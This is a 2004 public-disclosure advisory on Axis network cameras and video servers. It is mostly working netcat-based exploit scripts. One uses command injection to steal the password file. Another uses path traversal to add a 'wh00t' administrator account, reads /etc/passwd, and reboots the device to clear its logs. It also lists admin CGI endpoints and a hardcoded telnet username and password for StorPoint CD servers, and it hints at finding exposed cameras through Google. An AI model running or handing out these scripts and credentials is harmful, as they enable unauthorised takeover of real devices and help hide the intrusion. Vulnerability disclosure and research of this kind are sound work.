/* Public disclosure due lack of responce from Axis Communications */ I have found a couple of bugs in Axis Network Camera/Video Servers. (I have all Axis stuff in one e-mail, instead of multiple, lazy me.. ;) Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server. (There may be more devices vulnerable) Included files (some is simple shell scripts): axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40 axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!) axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;) axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers Check each section for more details. Quote of the day: Never say "whoops!", always say "Ah, Interesting!" Vendor, Contacted: >To: security@axis.com >Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST) Status: No responce what so ever. Fix/Workaround: None, v2.40 is the latest known version. Url: http://www.axis.com/ Greets to people in #hack.se @EFnet. Have a nice day /bashis ----[ axis-passwd.sh ]---- #!/bin/sh # # Get /etc/passwd from: # Axis 2100/2110/2120/2420 Network Camera 2.34/2.40 # AXIS 2130 PTZ Network Camera # AXIS 2400/2401 Video Server # (There may be more devices vulnerable) # # Problem: # PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'` # in 'virtualinput.cgi' # # Bug found and code by bashis 2004-08 # Greets: #hack.se @EFnet # # FAQ: # Q: Where is the cam's? # A: Google is your friend. # if [ ${#*} -ne 2 ] then printf "\nUsage: %s \n\n" $0 exit 1 fi # printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2 printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.1\n\n" | nc $1 $2 printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+++ Received:\n" printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2 printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n" ----[ axis-wh00t.sh ]---- #!/bin/sh # # Add admin account with l/p: wh00t/wh00t # Axis 2100/2110/2120/2420 Network Camera 2.12-2.40 # AXIS 2130 PTZ Network Camera # AXIS 2400/2401 Video Server # (There may be more devices vulnerable) # # Problem: # POST action follows "/../" # # Bug found and code by bashis 2004-08 # Greets: #hack.se @EFnet # # 2.12 seems to very buggy version, it add wh00t account, # but editcgi.cgi seems not to work.. # # Yes, you can use 'editcgi.cgi' to edit /etc/passwd # and change/add what you want, or browse around in filesystem. # # FAQ: # Q: Where is the cam's? # A: Google is your friend. # if [ ${#*} -ne 2 ] then printf "\nUsage: %s \n\n" $0 exit 1 fi # printf "+++ Sending request to %s:%d\n" $1 $2 printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n" printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250\nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables\n" | nc $1 $2 > /dev/null # Note.......^^^^^^^^^^^^^^^^^^^^^^ # printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd HTTP/1.0\nHost: 127.0.0.1\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2 # it's good to clear logfile, so let us reboot the device now printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n" | nc $1 $2 > /dev/null printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-bin/editcgi.cgi?file=\n" printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n" printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n" ----[ axis-cgi.txt ]---- # Well, not so mutch bugs here, but nice to know.. ;) # # From version: 2.12 and newer. # (All dosn't work with 2.12) # List all availible parameters. > http:///cgi-bin/admin/getparam.cgi or > http:///cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle Set one parameter. > http:///cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff # Note, Axis is changing 'cgi-bin' to 'axis-cgi' # /cgi-bin/admin/systemlog.cgi (show syslog) /cgi-bin/admin/serverreport.cgi (use[full|less] reports) /cgi-bin/admin/restart.cgi (restart device, also good to clear syslog) /cgi-bin/admin/paramlist.cgi (get some config) /cgi-bin/admin/getparam.cgi (shown above) /cgi-bin/admin/setparam.cgi (shown above) /cgi-bin/admin/factorydefault.cgi (hrmm.. ;) /admin-bin/editcgi.cgi?file= (browse filesystem, edit any file) ----[ axis-storpoint-cd-E100.txt ]---- # Yeah, old product.. old version.. but.. hardcoded l/p, uhm? # l: copyright p: mammalambalouie # # Note, this hardcoded l/p exist in other products and newer versions # of software as well, but i have not done so mutch research about this. $ telnet xxx.xxx.xxx.xxx Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000 AXIS StorPoint CD E100 network login: copyright Password: mammalambalouie AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000 Root> Root> q Goodbye! Connection closed by foreign host. $ ----